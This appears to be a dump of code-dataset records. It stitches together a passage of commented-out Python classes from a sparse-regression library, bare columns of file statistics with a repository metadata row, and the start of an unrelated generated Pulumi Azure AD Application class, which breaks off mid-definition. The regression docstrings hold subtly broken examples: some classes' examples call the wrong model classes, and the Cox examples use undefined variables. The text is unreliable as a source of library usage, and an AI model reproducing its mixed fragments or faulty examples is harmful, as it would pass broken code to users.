# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.):
# super(PdasLm, self).__init__(
# algorithm_type="Pdas", model_type="Lm", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 1
# @fix_docs
# class PdasLogistic(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> xbeta = np.matmul(x, beta)
# >>> p = np.exp(xbeta)/(1+np.exp(xbeta))
# >>> y = np.random.binomial(1, p)
# >>> model = PdasLogistic(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasLogistic(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasLogistic(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(PdasLogistic, self).__init__(
# algorithm_type="Pdas", model_type="Logistic", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 2
# @fix_docs
# class PdasPoisson(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> lam = np.exp(np.matmul(x, beta))
# >>> y = np.random.poisson(lam=lam)
# >>> model = PdasPoisson(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasPoisson(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasPoisson(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(PdasPoisson, self).__init__(
# algorithm_type="Pdas", model_type="Poisson", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau
# )
# self.data_type = 2
# @fix_docs
# class PdasCox(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> data = make_glm_data(100, 200, family="cox", cv=1, rho=0, sigma=1, c=10)
# >>> model = PdasCox(path_type="seq", support_size=[5])
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasCox(path_type="seq")
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasCox(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(PdasCox, self).__init__(
# algorithm_type="Pdas", model_type="Cox", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 3
# @fix_docs
# class L0L2Lm(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345) # fix seed to get the same result
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> noise = np.random.normal(0, 1, 100)
# >>> y = np.matmul(x, beta) + noise
# >>> model = PdasLm(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasLm(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasLm(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(L0L2Lm, self).__init__(
# algorithm_type="L0L2", model_type="Lm", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau
# )
# self.data_type = 1
# @fix_docs
# class L0L2Logistic(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345) # fix seed to get the same result
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> noise = np.random.normal(0, 1, 100)
# >>> y = np.matmul(x, beta) + noise
# >>> model = PdasLm(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasLm(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasLm(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(L0L2Logistic, self).__init__(
# algorithm_type="L0L2", model_type="Logistic", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 2
# @fix_docs
# class L0L2Poisson(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> lam = np.exp(np.matmul(x, beta))
# >>> y = np.random.poisson(lam=lam)
# >>> model = PdasPoisson(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasPoisson(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasPoisson(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(L0L2Poisson, self).__init__(
# algorithm_type="L0L2", model_type="Poisson", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau
# )
# self.data_type = 2
# @fix_docs
# class L0L2Cox(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> data = make_glm_data(100, 200, family="cox", cv=1, rho=0, sigma=1, c=10)
# >>> model = PdasCox(path_type="seq", support_size=[5])
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasCox(path_type="seq")
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasCox(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(L0L2Cox, self).__init__(
# algorithm_type="L0L2", model_type="Cox", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 3
# @fix_docs
# class GroupPdasLm(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345) # fix seed to get the same result
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> noise = np.random.normal(0, 1, 100)
# >>> y = np.matmul(x, beta) + noise
# >>> model = GroupPdasLm(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = GroupPdasLm(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = GroupPdasLm(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(GroupPdasLm, self).__init__(
# algorithm_type="GroupPdas", model_type="Lm", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 1
# @fix_docs
# class GroupPdasLogistic(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> xbeta = np.matmul(x, beta)
# >>> p = np.exp(xbeta)/(1+np.exp(xbeta))
# >>> y = np.random.binomial(1, p)
# >>> model = GroupPdasLogistic(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = GroupPdasLogistic(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = GroupPdasLogistic(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(GroupPdasLogistic, self).__init__(
# algorithm_type="GroupPdas", model_type="Logistic", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau
# )
# self.data_type = 2
# @fix_docs
# class GroupPdasPoisson(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> lam = np.exp(np.matmul(x, beta))
# >>> y = np.random.poisson(lam=lam)
# >>> model = GroupPdasPoisson(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = GroupPdasPoisson(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = GroupPdasPoisson(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(GroupPdasPoisson, self).__init__(
# algorithm_type="GroupPdas", model_type="Poisson", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 2
# @fix_docs
# class GroupPdasCox(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> data = make_glm_data(100, 200, family="cox", cv=1, rho=0, sigma=1, c=10)
# >>> model = GroupPdasCox(path_type="seq", support_size=[5])
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = GroupPdasCox(path_type="seq")
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = GroupPdasCox(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1
# ):
# super(GroupPdasCox, self).__init__(
# algorithm_type="GroupPdas", model_type="Cox", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path)
# self.data_type = 3
| 41.4494
| 210
| 0.597289
| 6,776
| 48,330
| 4.021842
| 0.040289
| 0.040511
| 0.02664
| 0.011008
| 0.926538
| 0.908374
| 0.905438
| 0.88199
| 0.881403
| 0.869955
| 0
| 0.025133
| 0.243431
| 48,330
| 1,165
| 211
| 41.484979
| 0.72017
| 0.703931
| 0
| 0.728507
| 0
| 0
| 0.011811
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095023
| false
| 0
| 0.072398
| 0
| 0.262443
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d3ee88eac3cdcac39ccdf8e39bbb4f3dbd4f5b3
| 84,489
|
py
|
Python
|
sdk/python/pulumi_azuread/application.py
|
AaronFriel/pulumi-azuread
|
d3161e0efd9bb7e67e26c0700d1b8e04e3c0184b
|
[
"ECL-2.0",
"Apache-2.0"
] | 11
|
2019-09-17T20:41:13.000Z
|
2021-12-28T02:06:40.000Z
|
sdk/python/pulumi_azuread/application.py
|
AaronFriel/pulumi-azuread
|
d3161e0efd9bb7e67e26c0700d1b8e04e3c0184b
|
[
"ECL-2.0",
"Apache-2.0"
] | 144
|
2019-05-08T20:53:11.000Z
|
2022-03-31T15:20:46.000Z
|
sdk/python/pulumi_azuread/application.py
|
AaronFriel/pulumi-azuread
|
d3161e0efd9bb7e67e26c0700d1b8e04e3c0184b
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2019-10-05T10:34:37.000Z
|
2022-01-18T18:43:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ApplicationArgs', 'Application']
@pulumi.input_type
class ApplicationArgs:
def __init__(__self__, *,
display_name: pulumi.Input[str],
api: Optional[pulumi.Input['ApplicationApiArgs']] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]] = None,
device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]] = None,
group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
logo_image: Optional[pulumi.Input[str]] = None,
marketing_url: Optional[pulumi.Input[str]] = None,
oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
optional_claims: Optional[pulumi.Input['ApplicationOptionalClaimsArgs']] = None,
owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
privacy_statement_url: Optional[pulumi.Input[str]] = None,
public_client: Optional[pulumi.Input['ApplicationPublicClientArgs']] = None,
required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]] = None,
sign_in_audience: Optional[pulumi.Input[str]] = None,
single_page_application: Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']] = None,
support_url: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
template_id: Optional[pulumi.Input[str]] = None,
terms_of_service_url: Optional[pulumi.Input[str]] = None,
web: Optional[pulumi.Input['ApplicationWebArgs']] = None):
"""
The set of arguments for constructing a Application resource.
:param pulumi.Input[str] display_name: The display name for the application.
:param pulumi.Input['ApplicationApiArgs'] api: An `api` block as documented below, which configures API related settings for this application.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]] app_roles: A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
:param pulumi.Input[bool] device_only_auth_enabled: Specifies whether this application supports device authentication without a user. Defaults to `false`.
:param pulumi.Input[bool] fallback_public_client_enabled: Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]] feature_tags: A `feature_tags` block as described below. Cannot be used together with the `tags` property.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_membership_claims: Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] identifier_uris: A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
:param pulumi.Input[str] logo_image: A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
:param pulumi.Input[str] marketing_url: URL of the application's marketing page.
:param pulumi.Input[bool] oauth2_post_response_required: Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
:param pulumi.Input['ApplicationOptionalClaimsArgs'] optional_claims: An `optional_claims` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] owners: A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
:param pulumi.Input[str] privacy_statement_url: URL of the application's privacy statement.
:param pulumi.Input['ApplicationPublicClientArgs'] public_client: A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]] required_resource_accesses: A collection of `required_resource_access` blocks as documented below.
:param pulumi.Input[str] sign_in_audience: The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
:param pulumi.Input['ApplicationSinglePageApplicationArgs'] single_page_application: A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
:param pulumi.Input[str] support_url: URL of the application's support page.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
:param pulumi.Input[str] template_id: Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
:param pulumi.Input[str] terms_of_service_url: URL of the application's terms of service statement.
:param pulumi.Input['ApplicationWebArgs'] web: A `web` block as documented below, which configures web related settings for this application.
"""
pulumi.set(__self__, "display_name", display_name)
if api is not None:
pulumi.set(__self__, "api", api)
if app_roles is not None:
pulumi.set(__self__, "app_roles", app_roles)
if device_only_auth_enabled is not None:
pulumi.set(__self__, "device_only_auth_enabled", device_only_auth_enabled)
if fallback_public_client_enabled is not None:
pulumi.set(__self__, "fallback_public_client_enabled", fallback_public_client_enabled)
if feature_tags is not None:
pulumi.set(__self__, "feature_tags", feature_tags)
if group_membership_claims is not None:
pulumi.set(__self__, "group_membership_claims", group_membership_claims)
if identifier_uris is not None:
pulumi.set(__self__, "identifier_uris", identifier_uris)
if logo_image is not None:
pulumi.set(__self__, "logo_image", logo_image)
if marketing_url is not None:
pulumi.set(__self__, "marketing_url", marketing_url)
if oauth2_post_response_required is not None:
pulumi.set(__self__, "oauth2_post_response_required", oauth2_post_response_required)
if optional_claims is not None:
pulumi.set(__self__, "optional_claims", optional_claims)
if owners is not None:
pulumi.set(__self__, "owners", owners)
if prevent_duplicate_names is not None:
pulumi.set(__self__, "prevent_duplicate_names", prevent_duplicate_names)
if privacy_statement_url is not None:
pulumi.set(__self__, "privacy_statement_url", privacy_statement_url)
if public_client is not None:
pulumi.set(__self__, "public_client", public_client)
if required_resource_accesses is not None:
pulumi.set(__self__, "required_resource_accesses", required_resource_accesses)
if sign_in_audience is not None:
pulumi.set(__self__, "sign_in_audience", sign_in_audience)
if single_page_application is not None:
pulumi.set(__self__, "single_page_application", single_page_application)
if support_url is not None:
pulumi.set(__self__, "support_url", support_url)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if template_id is not None:
pulumi.set(__self__, "template_id", template_id)
if terms_of_service_url is not None:
pulumi.set(__self__, "terms_of_service_url", terms_of_service_url)
if web is not None:
pulumi.set(__self__, "web", web)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
The display name for the application.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def api(self) -> Optional[pulumi.Input['ApplicationApiArgs']]:
"""
An `api` block as documented below, which configures API related settings for this application.
"""
return pulumi.get(self, "api")
@api.setter
def api(self, value: Optional[pulumi.Input['ApplicationApiArgs']]):
pulumi.set(self, "api", value)
@property
@pulumi.getter(name="appRoles")
def app_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]]:
"""
A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
"""
return pulumi.get(self, "app_roles")
@app_roles.setter
def app_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]]):
pulumi.set(self, "app_roles", value)
@property
@pulumi.getter(name="deviceOnlyAuthEnabled")
def device_only_auth_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether this application supports device authentication without a user. Defaults to `false`.
"""
return pulumi.get(self, "device_only_auth_enabled")
@device_only_auth_enabled.setter
def device_only_auth_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "device_only_auth_enabled", value)
@property
